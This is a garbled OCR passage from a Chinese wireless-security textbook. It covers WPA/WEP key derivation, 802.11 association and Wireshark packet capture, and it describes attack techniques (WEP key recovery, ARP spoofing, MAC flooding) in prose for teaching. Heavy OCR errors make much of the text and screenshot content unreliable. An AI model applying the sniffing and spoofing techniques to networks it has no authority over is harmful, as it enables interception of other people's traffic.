密 钥 在 域内 的 所 有 成 员 都 知道 ， 用 于 AP 发 
送 组 播 使 用 。 

广播 通信 一 般 是 不 加 密 的 ， 主 要 用 于 
AP 辣 整个 区 域 宣告 存在 ， 任 何 本 区 域 的 设 
备 都 可 以 获取 到 广播 信息 。 


3. 数据 加 密 完 整 性 校 验 

PMK (Pairwise Master Key) 是 一 串 
256 位 即 32 字 节 的 密 钥 ，PMK 的 计算 公式 ， 
ESSID+PSK+ 迭 代 次 数 4096 次 再 通过 Hash 计 
算 生 成 ， 其 中 PSK 是 无 线 密码 ，PMK 是 由 
STA 与 AP 分 别 计 算得 出 ，PMK 并 不 在 网 络 
中 进行 交换 。 


PTK (Pairwise Transient Key) 生成 算 
法 有 两 种 : HMAC-SHA1 散 列 算法 和 PRF-X 
散 列 算法 。 

PTK 的 计算 过 程 : PTK 是 通过 STA 与 AP 
的 四 步 握 手 信息 计算 出 来 的 ， 计 算 公 式 是 
PMK+Noncel+Nonce2+AP MAC+STIA MAC 
计算 生成 ， 它 是 一 串 256 位 的 哈 希 值 ， 如 下 
图 所 示 。 


STA : :AP 
: Anonce : 


Snonce+IMIC 
GTK+MIC 


ACK 


计算 PTK 的 步骤 如 下 : 
AP 向 STA 发 送 一 个 Nonce1， 这 个 
Nonce1 有 是 由 AP 随机 生成 的 ， 由 于 是 AP 随机 
生成 的 ， 因 此 把 它 简 记 为 Anonce。 
STA 拿 到 Noncel 后 随机 生成 Nonce2， 
这 时 需要 计算 PTK 的 所 有 信息 都 以 具备 ， 此 
时 STA 可 以 计算 出 PTK。 
STA 将 Nonce2 发 送 给 AP， 由 于 
Nonce2 是 由 STA 随 机 生成 ， 因 此 把 它 简 记 
为 Snonce。 它 是 以 明文 发 送 的 ， 同 时 STA 会 
通过 哈 币 算法 ， 计 算出 PTK 的 MIC 校 验 码 并 
一 同 发 送 给 AP， 这 个 MIC 码 是 不 可 逆 的 。 


稀 注 意 : 如 果 Snonce 在 发 送 过 程 中 被 自 
改 ， 此 时 AP 计算 的 PTK 将 改变 ，MIC 同 样 
无 法 匹配 ，AP 将 会 中 断 连接 ， 这 样 的 通信 
还 是 非常 安全 的 。 


此 时 AP 也 拥有 了 计算 PTK 的 所 有 数 
据 ， 通 过 相同 的 哈 希 算法 计算 出 PTK 的 MIC 
校 验 码 ， 再 与 STA 发 送 的 MIC 校 验 码 进行 比 
较 ， 如 果 MIC 相 同 ， 证 明 STA 是 知道 PMK 的 。 
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AP 将 GTK+MIC 发 送 给 STA， 此 时 
STA 便 拥有 了 PTK 与 GTK。 

STA 回 复 一 个 ACK 数 据 包 ， 用 于 告知 
AP 已 经 准备 好 PTK， 后 续 数 据 包 可 以 使 用 
PTK 进 行 加 密 数 据 。 


6.5 ”实战 汤 练 


实战 演练 1 一 一 WEP 的 解密 步 


熟悉 WEP 的 加 密 原 理 后 ， 再 来 了 解 一 
下 WEP 的 解密 原理 ，WEP 的 解密 还 是 比较 
简单 的 ， 它 是 加 密 过 程 的 一 个 逆序 过 程 。 

WEP 解 密 过 程 可 以 通过 下 图 来 描述 。 


RE 


解密 过 程 可 以 通过 以 下 几 个 步骤 完成 : 
通过 数据 包 中 的 IV 与 无 线 密码 生成 
KSA。 
通过 KSA 结 合 Key ID 生成 本 次 加 密 数 
据 的 客 钥 流 。 
step 较 通过 窗 钥 流 与 加 密 数 据 异 或 ， 得 到 本 
次 解密 数据 。 
step 加 如果 存在 数据 包 切 片 ， 将 解密 后 的 数 
据 包 组 装 成 原始 数据 。 
step 轿 通过 CRC32 算 法 生成 组 装 后 数据 包 的 
WY 
对 生成 的 [CV 数据 进行 校 验 。 
实战 演练 2 一 一 无 线 通 信和 的 过 程 

要 想 将 计算 机 或 手机 等 终端 设备 连接 
到 无 线 网 络 ， 必 须 经 过 3 个 过 程 ， 分 别 是 扫 
描 (SCAN) 、 认 证 (Authentication ) 与 
关联 (Association ) 。 经 历 这 些 过 程 后 STA 
才能 与 AP 建立 关联 ， 并 开始 通信 ， 下 图 为 
STA 与 AP 建立 关联 的 示意 图 。 
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一 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


STA AP 
Disc oreT7 选 择 AP 
(采用 侦 听 Beacon 帧 或 友 送 Probe 由 ) 


Authentication 


CC 


ASsSOoCc1at1lion 


-oo 


同 建立 Association 关 联 的 AP 通 入 
CC 


1. 扫描 (SCAN) 


扫描 过 程 分 为 如 下 两 种 情况 : 

(1) 若 无 线 站 点 STA 设 成 Ad-hoc (无 
AP) 模式 。 

STA 先 寻找 是 否 已 有 IBSS (与 STA 
所 属相 同 的 SSID ) 存在 ， 如 有 ， 则 参加 
(join) ; 寿 无 ， 则 会 目 己 创建 一 个 IBSS， 
等 其 他 工作 站 连接 。 

(2) 知 无 线 站 点 STA 设 成 Infrastructure 
(有 AP) 模式 ， 可 以 分 为 如 下 两 种 情况 。 

e 主动 扫描 方式 (特点 : 能 迅速 找 

到 ) ， 依 次 在 每 个 信道 上 发 送 Probe 
request 数 据 帧 ， 从 Probe Response 中 
获取 BSS 的 基本 信息 ，Probe Response 
包含 的 信息 和 Beacon 帧 类 似 。 

e 被 动 扫描 方式 〈 特 点 : 找到 时 间 较 

长 ， 但 STA 节 电 ) 。 

通过 侦 听 AP 定期 发 送 的 Beacon 帧 来 发 
现 网 络 ，Beacon 帧 中 包含 该 AP 所 属 的 BSS 
的 基本 信息 以 及 AP 的 基本 能 力 级 ， 包 括 : 
BSSID (AP 的 MAC 地 址 ) 、SSID、 支 持 的 
速率 、 文 持 的 认证 方式 ， 加 密 算法 、Bea- 
cons 帧 发 送 间隔 ， 使 用 的 信道 等 。 

当 未 发 现 包 含 期 望 的 SSID 的 BSS 时 ， 
STA 可 以 工作 于 IBSS 状 态 ， 扫 描 阶 段 的 STA 
不 断 的 请 求 ， 通 过 AP 返 回 的 帧 判断 AP 存 
在 ， 下 图 为 实现 扫描 示意 图 。 
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Probe Request 


Probe Response 


Probe Request 


Probe Response 


> 


2. 认证 

802.11 文 持 两 种 基本 的 认证 方式 : 

第 一 种 : Open-system Authentication 
(开放 型 ) ， 即 开放 型 连接 ， 下 图 为 连接 
示意 图 。 

(1) 等 同 于 不 需要 认证 ， 没 有 任何 安 
全 防护 能 力 。 

(2) 通过 其 他 方式 来 保证 用 户 接 入 网 
络 的 安全 性 ， 例 如 Address filter、 用 户 报 文 
中 的 SSID。 


STA AP 


Authentication Request 


Authentication Response 
(success) 


第 二 种 : Shared 一 Key Authentication 
(共享 密 钥 ) ， 即 共享 Key 连 接 ， 下 图 为 共 

享 Key 连 接 示 意图 。 

(1) 采用 WEP 加 密 算 法 。 

(2) Attacker 可 以 通过 监听 AP 发 送 
的 明文 Challenge text 和 STA 回复 的 密 文 
Challenge text 计算 出 WEP KEY。 

另外 ，STA 可 以 通过 Deauthentication 来 
终结 认证 关系 。 


Authentication Response 
success) 


3. 关联 (Association) 


(1) Association。STA 通过 Association 
和 一 个 AP 建立 关联 ， 后 续 的 数据 报 文 的 收 
发 只 能 和 建立 Association 关系 的 AP 进行 。 

(2) Reassociation。STA 在 从 一 个 老 的 
AP 移动 到 新 AP 时 ， 通 过 Reassociation 和 
新 AP 建立 关联 。Reassociation 前 必须 经 历 
Authentication 过 程 。 

(3) Deassociation。STA 通 过 Deasso- 
ciation 和 AP 解除 关联 关系 ， 整 体 的 过 程 可 
以 总 结 成 以 下 三 个 步骤 : 

Probe 过 程 ， 首 先 STA 向 所 有 信道 发 出 
Probe 帧 ， 发 现 AP， 其 次 AP 应 和 谷 Response。 

Authentication 过 程 ， 首 先 STA 向 AP 发 
出 验证 请 求 ， 然 后 进行 认证 过 程 (这 个 过 
程 可 能 会 存在 多 个 数据 交互 ) ， 其 次 AP 响 


应 STA 的 认证 结果 。 
Association 过 程 ， 首 先 STA 发 出 关联 
请 求 ， 其 次 AP 响应 关联 请 求 。 

通过 以 上 三 个 步骤 后 如 果 认 证 成 功 ， 
便 可 以 开始 通信 。 下 图 为 其 中 的 通信 流程 。 


ProbeRequest AP 


ProbeResponse 
二 一 
R 
AuthenticationRequest 
一 一 一 和 


Authentication Process 


AuthenticationResponse 
二 一 一 


AssociationRequest 


第 三 步 


第 一 步 
| 
| 
| 

AssociationResponse 


6.6 “小 试 身 手 


练习 1: 认识 无 线 数据 帧 的 结构 。 
练习 2: 了 解 控制 帧 的 作用 与 工作 原理 。 
练习 3: 了 解 绾 理 帧 的 作用 与 工作 原理 。 
练习 4: 了 解数 据 帧 的 作用 与 工作 原理 。 
练习 5: 擎 握 无 线 通 信 的 加 密 原 理 。 
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第 7 草 ”无 线 网 络 的 安全 分 析 工 具 


Wireshark (前 称 Ethereal) 是 一 个 网 络 封包 分 析 软 件 ， 主 要 功能 是 捕获 网 络 封包 ， 
并 尽 可 能 显示 出 最 为 详细 的 网 络 封 包 信 息 ， 网 络 管理 员 使 用 Wireshark 可 以 检测 当前 网 络 


问题 。 


7.1 认识 Wireshark 


Wireshark 不 是 入 侵 检 测 工 具 ， 对 于 网 
行为 ， 不 会 产生 警示 或 是 任 
何 提示 ， 用 户 只 有 仔细 分 析 Wireshark 捕 获 的 
封包 ， 才 能 了 解 当前 网 络 的 运行 情况 。 


功能 介绍 
Wireshark 是 使 用 比较 广泛 的 网 络 抓 包 


”软件 ， 主 要 是 因为 其 开源 免费 ， 通 过 修改 源 


码 还 可 以 添加 个 性 的 功能 。 使 用 的 人 群 主要 
有 网 络 管理 员 、 网 络 工程 师 、 安 全 工程 师 、 
IT 运 维 工 程 师 以 及 网 络 爱 好 者 。 

在 实际 应 用 中 ， 使 用 Wireshark 可 以 进 
行 网 络 底层 分 机 、 解 决 网 络 故 障 问题 、 发 现 
潜在 网 络 安 全 问题 等 。 下 面 进行 详细 介绍 : 

(1) 网 络 确 层 分 析 。 通 过 Wireshark 可 
以 捕获 底层 网 络 通信 ， 对 于 初学 者 而 言 可 
以 更 加 直观 地 去 了 解 网 络 通 信 中 每 一 层 数 
据 处 理 的 过 程 ， 如 果 想 要 成 为 一 个 网 络 工 
程 师 ， 了 解 和 熟悉 网 络 中 每 一 层 通信 过 程 
是 非常 有 必要 的 。 

(2) 解决 网 络 故 障 问 题 。 由 于 网 络 的 
特殊 性 ， 所 以 引起 网 络 故 障 的 方式 也 是 多 
样 的 ， 通 过 Wireshark 可 以 很 好 地 检查 网 络 
通信 的 各 个 环节 ， 精 确定 位 到 具体 发 生 故 
障 的 节点 以 及 可 能 发 生 故 障 的 区 域 。 

(3) 发 现 潜在 网 络 安全 问题 。 通 过 
Wireshark 对 网 络 数据 包 分 析 ， 可 以 发 现 
网 络 中 潜在 安全 问题 ， 例 如 : ARP 欺骗 、 
DDOS 网 络 攻击 等 。 


7.1.2 抓 包 原 理 


Wireshark 是 一 个 路 平台 抓 包 软 件 ， 可 
以 很 好 地 工作 在 Windows 系 统 、MacOS 系 
统 、Linux 以 及 Unix 系 统 平台 ， 也 正 是 这 样 
的 路 平台 所 以 受到 使 用 者 的 追捧 。 

Wireshark 为 什么 可 以 抓 到 网 络 包 ， 可 
以 从 网 络 原 理 与 底层 原理 两 方面 来 分 析 。 


1. 网 络 原理 


网 络 原 理 是 在 何 种 网 络 环境 下 进行 
抓 包 ， 这 是 抓 包 的 前 握 ， 其 中 分 为 三 种 情 
况 ， 即 本 机 环境 、 集 线 器 环境 、 交 换 机 
环境 。 

(1) 本 机 环境 。 本 机 环境 主要 针对 流 经 
本 机 网 卡 的 数据 包 。 下 图 为 抓 包 示 意图 。 


Wireshark 


(2) 集线器 环境 。 这 种 情况 在 网 络 中 
有 多 台 主 机 ， 多 台 主 机 通过 集线器 进行 网 
络 通 信 ， 集 线 器 属于 物理 层 设备 ， 从 某 一 
个 接口 接收 的 数据 包 ， 会 被 集线器 从 其 他 
所 有 接口 转发 出 去 。 利 用 集线器 的 这 个 原 
理 ， 通 过 PC1 进行 抓 包 便 可 以 抓 取 整个 局 
域 网 的 数据 。 下 图 为 抓 包 示意 图 。 
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(3) 交换 机 环境 。 集 线 器 的 最 大 缺点 在 于 使 用 集线器 的 整个 局 域 网 属于 一 个 “ 神 突 域 ”， 
而 且 随 着 终 亲 数量 的 增加 ， 冲 突 的 频率 也 越 来 越 高 ， 通 信和 质量 严重 下 降 ， 而 交换 机 每 一 个 
接口 属于 一 个 单独 的 “冲突 域 ”， 整 个 局 域 网 被 分 割 为 很 多 小 的 “冲突 域 ”， 通 信 质 量 大 
大 提高 。 

交换 机 环境 实现 抓 包 可 以 分 为 三 种 形式 ， 分 别 是 端口 镜像 、ARP 欺 矣 和 MAC 汉 洪 。 

(1) 端口 镜像 。 在 交换 机 网 络 中 将 所 有 通过 交换 机 中 转 的 数据 包 ， 全 部 都 复制 一 份 流 
经 一 个 端口 ， 这 个 就 是 亲口 镜像 ， 如 下 图 所 示 。 


(2) ARP 欺骗 。 在 交换 机 中 保存 了 一 份 MAC 地 址 表 ， 其 中 包含 局 域 网 中 各 个 主机 
MAC 地 址 ， 通 过 PC1 发 送 ARP 地 址 欺骗 可 以 将 局 域 网 中 所 有 MAC 地 址 都 改写 为 PC1 的 
地 址 ， 此 时 所 有 数据 都 将 流 经 PC1， 再 由 PC1 进行 转发 由 此 实现 抓 包 ， 如 下 图 所 示 。 


en ARP 回 复 《〈 找 骗 〉 : 我 是 IP3， 对 MCI ARP 请 求 ( 广 播 ) : 谁 是 IP3- 麻 烦 将 MAC 地 址 告知 我 PC2 
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四 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


(3) MAC 泛 洪 : 通过 PC1 发 送 大 量 MAC 地 址 信息 的 垃圾 数据 包 ， 导 致 交 换 机 MAC 
地 址 表 爆 表 ， 当 交换 机 没有 MAC 地 址 表 时 ， 流 经 交换 机 的 所 有 数据 都 会 以 广播 的 形式 发 


送 ， 如 下 图 所 示 。 


泛 洪 垃圾 包 ， 产 生 大 量 MXLIAC 地 址 


Wireshark 


2. 底层 原理 


Wireshark 抓 包 的 底层 原理 ， 如 下 图 
所 示 。 


GTK 1/2 


Wireshark 抓 包 搬 层 原 理 示 意图 中 的 主 
要 内 容 介 绍 如 下 : 

(1) Wimlibcap。 这 是 Wireshark 抓 包 
时 所 依赖 的 库 文 件 ， 也 是 Wireshark 最 核心 
最 底层 的 支持 库 。 

(2) Capture。 捕 包 引 擎 ， 利 用 Wimlib- 
pcap 从 底层 抓 取 网 络 数据 包 ，Wimlibpcap 
提供 了 通用 的 抓 包 接口 ， 能 从 不 同类 型 的 
网 络 接口 〈 包 括 以 太 网 、 令 牌 环 网 、AITM 
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医治 


网 等 ) 获取 网 络 数据 。 

(3) Wiretap。 格 式 支 持 ， 从 抓 包 文件 
中 读 取 数据 包 ， 文 持 多 种 文件 格式 。 

(4) Core。 核 心 引 擎 ， 通 过 函数 调用 将 
其 他 模块 连接 在 一 起 ， 起 到 联动 调度 的 作 
用 ， 其 中 还 包括 一 个 Epan( 包 分 析 引 擎 ) ， 
该 Epan 可 以 将 各 种 获取 的 数据 包 进 行 分 类 
解析 。 

(5) Protocol-Tree。 保 存 数据 包 的 协议 
信息 , Wireshark 的 协议 结构 采用 树 形 结构 ， 
解析 协议 报 文 时 只 须 从 根 节 点 通过 函数 名 
柄 依次 调用 各 层 解析 函数 即 可 。 

(6) Dissectors 。 在 Epan/disserctor 目 录 
下 ， 各 种 协议 解码 器 ， 文 持 700 多 种 协议 解 
析 ， 对 于 每 种 协议 ， 解 码 器 都 能 识别 出 协议 
字段 (field) ， 并 显示 出 字段 值 (field val- 
ue) ， 由 于 网 络 协议 种 类 很 多 ， 为 了 使 协议 
和 协议 间 层 次 关系 明显 ， 对 数据 流 里 的 各 
个 层次 的 协议 能 够 逐 层 处 理 ，Wireshark 系 
统 采用 了 协议 树 的 方式 。 

(7) Plugins。 一 些 协议 解码 器 以 插件 
的 形式 实现 ， 源 人 码 在 plugins 目录 。 


(8) Display-Filters。 显示 过 滤 引擎 ， 
源码 在 epan/dfilter 目录 。 
(9) GTK1/2。 图 像 处 理工 具 ， 


户 的 输入 输出 信息 。 


7.1.3 基本 界面 


使 用 Wireshark 抓 包 软 件 先 要 从 它 的 界 
面 入 手 ， 其 主 界 面包 括 工 具 栏 、 快 捷 沫 单 、 
筛选 过 滤 、 功 能 显示 窗口 以 及 任务 栏 等 。 

打开 Wireshark 抓 包工 具 ， 单 击 “ 应 
用 程序 ”下 拉 菜 单 ， 从 中 选择 “09- 员 探 / 
欺骗 ”菜单 项 ， 在 弹出 的 菜单 中 可 以 看 到 
Wireshark 图 标 ， 如 下 图 所 示 。 


应 用 程序 ~ 


处 理 用 


= bdfproxy 


Tw driftnet 


信息 收集 
02 - 漏洞 分 析 
03 - Web 程 序 ettercap-g... 
4 - 数据 库 评 估 软 件 
)5 - 密码 攻击 


hamster 


< macchanger 
06 - 无 线 攻击 


逆向 工程 

08 - 漏洞 利用 工具 集 
9 - 嗅 探 / 欺 骗 
- 权限 维持 


i 
netsniff-ng 
本 
- 数字 取证 
_ 报告 工具 集 
单 击 Wireshark 图 标 便 可 以 打开 Wireshark 
抓 包 软件 。 下 图 为 其 工作 界面 。 


Wireshark 网 络 分 析 只 ___r 菜单 栏 OO 
文 性 {F) 编辑 [四 ”视图 [V) 跳 转 [G) 拥堵 (中 分析 办) 弹 计 (5S) 电话 无 线 (W] 工具 (T) 帮助 (HM 


是 国 加 总 四 a ** 2* " 国 虽 aa a ae 


上 — ” 已 3 "| 表达 式 


wireshark 


欢迎 使 用 Wireshark 功能 界面 
打 了 

Arootjwep-0l.cap (67 KB] 

/root/lll.pcap (134 Bytes) 

捕获 

- 便 用 这 个 过 小 器 : | 中 | Enter s cal 


- 可 
用 户 指导 ”Wiki ”问题 与 解答 ”邮件 列 家 
任务 栏 运行 Wireshark2.6.31GiHV2.6.3 packaged a5 2.6,3-1), 


se 无 分 担 profile: Defaulr 


如 果 已 经 进行 了 抓 包 操作 ， 当 打开 一 
个 数据 包 后 ， 其 工作 界面 如 下 图 所 示 。 
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L wep-0lcap | > 打开 的 文件 信息 所 日 日 
文件 [F| 炉 辑 IE) 视图 [Vj 路 转 [G) 项 获 问 分 析 [A) 颖 计 (5) 电话 (yj) 无 线 (W 工 其 (T) 更 励 (H) 
EE 


_ 数据 包 窗口 


着 加 可 回避 三 QQ 站 


nation 
H iTe :cd (a 
‘Hast 
0 LH co )9:09:5D (58:00:63:509:0 Tp-LinkT 33:690:73 (f4: 
4 2019- 19- el :61， 332412 ， LiteonTe :98:5 59. 
"dc OMob1 3 (28 
2010- 1 0 0s; 00: 6 9460 pee eiTe oe :10; 2 (bs 15:13:8¢:10 ) (TA) VivoMobi ba:61:03 (20:f 
29 B62 Ua “BC mobi 上 :3 (28: 
nMnhi An tfe' 


Fram 3:; 10 bytes on 


yy Captured (I28 bitsy 
IEEE #02.11 Request-to-s | 
bs tn Es Req st-t to 
ol F 


nn 
A 10 bytes 
SS* 
end 【ex obib) 
» 
000 ee1 1016 oe00 - oo at ee mn hp 
Rv mk 


1 
:08 (ra 
Toe i! ite e b9: 和 5b 一 一 pe a ee Gb) 


-一 


A 4 Be ae 83 CC 33 Ee7 Be €3 bg 8 3 SX [ 
-~ 数据 具体 字段 


分 组 信息 显示 


OY wep-olcap | 分 组 : 1772 ,已 蚂 条 :1772 (100 Ow) | profile: Default 


下 面 重点 介绍 Wireshark 工 作 界 面 中 常 
用 沫 单 : 

(1) 文件 菜单 。 文 件 染 单 主要 负责 打 
开 已 经 抓 取 的 数据 包 、 最 近 打 开 的 数据 包 
合并 数据 包 、 导 入 导出 特定 数据 包 。 这 个 
在 后 面 还 会 重点 讲解 ， 只 对 界面 做 人 简 
单 了 解 。 下 图 为 文件 菜单 结构 。 


打开 Ctrl+O 

打开 最 近 ， 
合并 (M)... 

从 Hex 转 储 导入 (1)... 
关闭 Ctrl+W 

妨 存 为 (A)... Ctrl+Shift+S5 
文件 集合 : 
导出 特定 分 组 .. 

导出 分 组 解析 结果 


导出 PDU 到 文件 .. 

导出 SSL 会 话 密 钥 .. 

导出 对 象 
了 ED(P).. Ctrl+P 

退出 CtrltrQ 


(2) 编辑 沫 单 。 编 辑 菜 单 主要 负责 对 
数据 包 分 类 标记 ， 以 及 在 抓 包 过 程 中 按照 
时 间 大 小 进行 分 包 存 储 ， 还 有 整个 软件 的 
首选 项 也 在 编辑 菜单 中 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


复制 | v 主 工 具 栏 (MI) 
Q\ 查找 分 组 (E). Ctrl+F Vv| 过 滤器 工具 栏 (F) 
查找 下 一 个 IN) Ctrl+N 无 线 工具 栏 山 
查找 上 一 个 心 Ctrl+B V| 状态 栏 I5) 
标记 /取消 标记 分 组 (M) Ctrl+M 全 屏 (F) F11 
标记 所 有 显示 的 分 组 Ctrl+Shift+M | 分 组 列表 (L) 
v 分 组 详情 (D) 
v 分 组 字 节 流 (B) 
忽略 /取消 忽略 分 组 Ctrl+D 时 间 显 示 格 式 四 
解析 名 称 
缩放 (2) » 
设置 /取消 设置 时间] 参考 Ctrl+T 
展开 全 部 (E) Ctrl+Right 
收 起 全 部 (A) Ctrl+Left 
时 间 平 移 .. Ctrl+Shift+T 于 着 色 分 组 列表 
分 组 注释 ... Ctrl+Alt+C 着 色 规 则 (C).. 
Delete All Packet Comments 对 话 着 色 » 
配置 文件 .. Ctrl+Shift+A 重 置 布局 Ctrl+Shift+W 
首选 项 (Pl... Ctrl+Shift+P 垩 调整 列 帘 Ctrl+Shift+R 
， 内 部 ; 
(3) 捕获 菜单 。 捕 获 菜单 用 于 设置 捕 RE 
获 规则 ， 其 中 选项 菜单 可 以 设置 捕获 的 网 重新 载 入 为 文件 格式 / 擅 获 CtrltShift+F 
加 重新 加 载 (R) Ctrl+R 


卡 ， 还 可 以 设置 捕获 规则 ， 如 下 图 所 示 。 


(6) 统计 菜单 。 统 计 衣 单 可 以 通过 对 


图 选项 (0).. Ctrl+K 0 、 
pg i 已 有 数据 进行 图 形 化 数据 分 析 ， 这 个 功能 
上 对 于 分 析 大 量 数 据 是 非常 有 帮助 的 ， 如 下 
图 所 示 。 
捕获 过 滤器 (F)... 捕获 文件 属性 Ctrl+Alt+Shift+C 
刷新 接口 列表 FS 已 解析 的 地 址 
协议 分 级 (P) 
(4) 分 析 莱 单 。 分 析 沫 单 针 对 已 经 获 对 话 
取 的 数据 包 进 行 分 析 ， 通 过 制定 相应 的 规 端点 
= 分 组 长 度 
则 第 分 数据 包 ， 如 下 图 所 示 。 ed 
显示 过 滤器 .. 服务 响应 时 间 ' 
显示 过 滤器 宏 (M).. DHCP (BOOTP) Statistics 
ONC-RPC Programs 
作为 过 滤器 应 用 oy 
准备 过 滤器 » 
BACnet » 
对 语 过 小 器 Collectd 
启用 的 协议 .… Ctrl+Shift+E DNS 
解码 为 (A)... 
重新 载 入 Lua 插件 Ctrl+Shift+L 流量 图 
SCTP » HART-IP 
追踪 流 ， HPFEEDS 
HTTP 
专家 信息 
一 Sametime 
(5) 视图 菜单 。 视 图 菜单 主要 是 针对 TCP 流 图 形 
一 HH J， 三 UDP 多 播 流 
软件 中 的 视图 显示 进行 设置 ， 重 点 需要 关 
注 的 是 解析 名 称 、 列 显示 中 的 着 色 规 则 ， IPv4 Statistics » 
如 下 图 所 示 。 IPv6 Statistics 
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7.2 ”开始 抓 包 


通过 前 面 的 学 习 ， 相 信 读 者 对 Wireshark 
有 了 一 个 基本 的 了 解 ， 下 面 针 对 如 何 抓 取 数 
据 以 及 如 何 对 数据 过 小 进行 讲解 。 


7.2.1 快速 配置 


Wireshark 的 特点 是 简单 易 用 ， 通 过 简 
单 的 设置 便 可 以 开始 抓 包 ， 甚 至 只 须 选 择 
一 个 网 卡 后 ， 单 击 “ 开 始 ” 按 钮 ， 便 可 以 
实现 快速 抓 包 。 


1. 抓 包 操作 


具体 操作 步骤 如 下 : 
打开 Wireshark 抓 包工 具 ， 在 界面 “ 捕 
获 ” 功 能 选项 中 ， 可 以 对 捕获 数据 包 进 行 
快速 配置 ， 如 果 网 卡 中 产生 数据 ， 会 在 网 
卡 的 右 侧 显 示 折 线 图 ， 如 下 图 所 示 。 
捕获 
.使 用 这 个 过 滤器 : | 内 | Entera capture filter .. 


wlanOmon 


NW 
any ~NW 


Loopback: lo 
wlan0 
nflog 


双击 选中 的 网 卡 ， 便 可 以 开始 抓 包 ， 
此 时 “开始 ”按钮 变 成 灰色 ，“ 停 止 ” 按 
钮 与 “ 重 置 ”按钮 可 选 。 下 图 为 Wireshark 
工具 抓 取 的 数据 信息 。 


正在 独 获 wian0mon ©O@0 
文 性 三 ) 编 辆 候 ) 祝 细 (VM) 民国 [SG 朱 蕊 (分 析 [ 科 弹 计 全 电 划 全 元 线 (W) 工 其 [中 于 助 HH) 
A**I. i aaa 下 
Npoly Peay filter ' E3 -| 表 这 式 - + 
No, Tne Source Destination ~ 
1787 ?261B-1B-19 64:63:51.9345. Huaweile 7c:fe:15 (e4:00:a3:7c:fe:15) (T\) Fujitsu b 【96:66 : 
1788 26318-19"36 64:63:54.9359,. Hy e€ 7c:fe:15 (e4:690:a3:7c:fe:45) (T,) Fujits 96:96:9e 
1789 2018-18-10 64;03;51,9446, Fujitsu 72:ab;290 (00:60;00:;72 
1799 261B8-19-19 84:93:51.9529. Huaw' (a8:d 
47914 263B8-19"36 64:03:54.9657. Fujlitsu 72:ab:296 (96:66:9e 
1792 2018-10-10 64:;03;51,9687, HyawciTe 7c:fe:15 (¢4:;68:a3;70:fe:15) (TI) Fyujitsu 72:ab;20 (00:60:;06;7 
» Frame 1; 28 bytes on wire (224 bits), 26 bytes captur ed (224 bits) on inlerface 0 
» Radioran Meager vB, Lenprh 18 
» B02,11 radio infornatlon 
» TEEE 802.11 Mknowledyenent, Flaygs; .,..,.,， 


Monf 0 89 12 60 ze 48 a9 08 69 82 99 9 9 69 WW 81 H || 
: H. Pp..W 


68 86 da 86 6B 66 #68 oh 59 82 94 57 


7 mian0morc <live caplurein progress> 分 组 : 1792 -已 旺 示 ; 792(100.0%) Profile; Default 


侈 提示 : 抓 包 一 旦 开始 ， 默 认 数 据 包 显 
示 列 表 会 动态 刷新 最 新 捕获 的 数据 。 单 击 
“停止 ”按钮 可 以 停止 对 数据 包 的 捕获 ， 
此 时 状态 栏 会 显示 当前 捕获 的 数据 包 数 量 
及 大 小 。 
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2. 数据 包 显 示 列 
默认 情况 下 ，Wireshark 会 给 出 一 个 初 


上 ramne 泣 =553, FN=DB, 
7 5 send, Flags=... 
le_ic:r end, Flogs=... 
iTe Tc:f 34 Request -to-send, Flays=... 
28 Acknowledgcment, Floags=... 

8 Ackn H I Fla 


:1;00:609 Orc 
122 64:12:441 .699538268 n_2f: b 
123 04:12:41, 17196773892 i 


125 04:12:41.711347375 
0 64- :1 ,714919849 


动 分 配 。 

(2) Time。 时 间 ， 根 据 捕获 时 间 设 定 
该 列 。 

(3) Source: 源 地 址 信息 ， 如 果 数 据 包 
包含 源 地 址 信息 ， 例 如 IP、MAC 等 ， 这 类 
言 轧 会 显示 在 这 列 当 中 。 

(4) Destination。 目 的 地 址 信息 ， 同 源 
地 址 类 似 。 

(5) Protocol。 协 议 信 息 ， 捕 获 的 数据 
包 会 根据 不 同 的 协议 进行 标注 ， 这 列 显示 
具体 协议 类 型 。 

(6) Length。 长 度 信息 ， 标 注 出 该 数据 
包 的 长 度 信息 。 

(7) Inof。 信 息 ，Wireshark 对 数据 包 
的 一 个 解读 。 


3. 修改 显示 列 


默认 的 显示 列 可 以 修改 ， 在 实际 数据 
分 析 当 中 ， 根 据 需 要 可 以 修改 显示 列 的 项 
目 ， 具 体操 作 步 又 如 下 : 
[step 回 选中 需要 加 入 显示 列 的 子 项 ， 右 去 ， 
在 弹出 的 快捷 菜单 中 选择 “应 用 为 列 ” 菜 
单 命 令 ， 如 下 图 所 示 。 


文件 (F) 编辑 |E) 视图 (Y) 跳 转 (G) 捕获 (C) 1 
re , . 展开 全 部 (E) 
[| Apply a display filter ... <Ctrl-/> 应 用 为 列 
No. Time 7 Sour 必 为 过 滤器 应 用 
121 04:12:41.6882099687 ET 
122 64:12:41.699536268 Shen 。 准备 过 滤 句 
123 04:12:41.796773892 Huaw 对话 过 滤器 
124 G4:12:41,798821624 Huaw . 
125 84:12:41.711347375 用 过 渡 器 着 色 
126 94:12:41.714919849 追 啼 流 
a 
IEEE 892.11 Acknowledgement ， Flags 复制 
Type/subtype: Acknowledoement {4 显示 分 组 字 切 .. 
r Frame Control Field: OOxa400 we 
2 69 = Version: 0 导出 分 组 子 书 流 昌 )…- 
Dr ee i frar Wiki 协议 页 面 
.... = Subtype: 1 > 
» Flags: 90x69 过 滤器 字段 参考 
.000 0900 0000 9999 = Duration: 协议 首选 项 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


Eh 大 “~ 了 :> 入 牛 协 ~、 * 大 EF 

此 时 显示 列 中 会 加 入 新 列 ， 这 样 针 对 特殊 协议 分 析 会 编辑 列 
> 党 帮 助 所 元 适应 内 容 
第 ， 如 下 图 所 示 。 
No. Time ”Source Destination Protocol Length Type Info 

121 B4:12:41.6B882998687 42:31:3c:':e1:dB:69 Broadcast 862.11 4B1 Management fr.. Beacon frame, V No. 

122 B64:12:41.699536298 shenzhen_2f :7a:0,.. des ee 862,.11 34 Control frame Request-to-send, 

123 B64:12:;41.786773892 HuaweiTe_7?c:fe:1i... Guangdon_d8:ec:9.，882.11 34 Control frame Reguest-to-send, Vv Time 

124 BA:12:41.788821624 HuaweiTe ?c:fe:1i... Guangdon d6:ec: 882.11 34 Control frame Request-to-send, 

